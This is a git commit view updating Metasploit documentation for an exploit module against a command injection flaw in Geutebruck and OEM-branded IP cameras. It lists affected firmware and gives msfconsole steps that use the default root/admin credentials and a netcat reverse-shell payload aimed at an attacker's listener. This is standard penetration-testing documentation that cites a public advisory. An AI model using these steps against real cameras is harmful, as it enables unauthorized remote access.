dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update geutebruck_testaction_exec.md 

it should be better now :)
This commit is contained in:
ddouhine 2020-08-13 16:02:18 +02:00 committed by gwillcox-r7
parent a14a2fe8d2
commit e4f760691e
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
1 changed files with 28 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
View File

@ -1,6 +1,7 @@
## Vulnerable Application ## Vulnerable Application
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
Encoder and E2 Series Camera models:
G-Code: G-Code:
EEC-2xxx EEC-2xxx
G-Cam: G-Cam:
@ -9,33 +10,48 @@ G-Cam:
ETHC-22xx ETHC-22xx
EWPC-22xx EWPC-22xx
Many brands use the same firmware:
UDP Technology (which is also the supplier of the firmware for the other vendors)
Ganz
Visualint
Cap
THRIVE Intelligence
Sophus
VCA
TripCorps
Sprinx Technologies
Smartec
Riva
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
### Description ### Description
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
Tested it with the 1.12.14.5 firmware only.
## Verification Steps ## Verification Steps
List the steps needed to make sure this thing works 1. Start the camera using default configuration
2. Launch msfconsole
1. Do: `use exploit/linux/http/geutebruck_testaction_exec` 3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
2. Do: `set httpusername root` 4. Do: `set httpusername root`
3. Do: `set httppassword admin` 5. Do: `set httppassword admin`
4. Do: `set lhost 192.168.14.1` 6. Do: `set lhost <metasploit_ip>`
5. Do: `set rhosts 192.168.14.58` 5. Do: `set rhosts <camera_ip>`
6. Do: `set payload cmd/unix/reverse_netcat_gaping` 6. Do: `set payload cmd/unix/reverse_netcat_gaping`
7. Do: `check` 7. Do: `check` to be sure the target is vulnerable
8. Do: `exploit` 8. Do: `exploit`
9. You should get a shell
## Options ## Options
### HTTPUSERNAME The default credentials to log on the web interface are root/admin.
### HTTPUSERNAME
A username used to authenticate on the admin page. **Default: root** A username used to authenticate on the admin page. **Default: root**
### HTTPPASSWORD ### HTTPPASSWORD
The password of the username used to authenticate on the admin page. **Default: admin** The password of the username used to authenticate on the admin page. **Default: admin**
## Scenarios ## Scenarios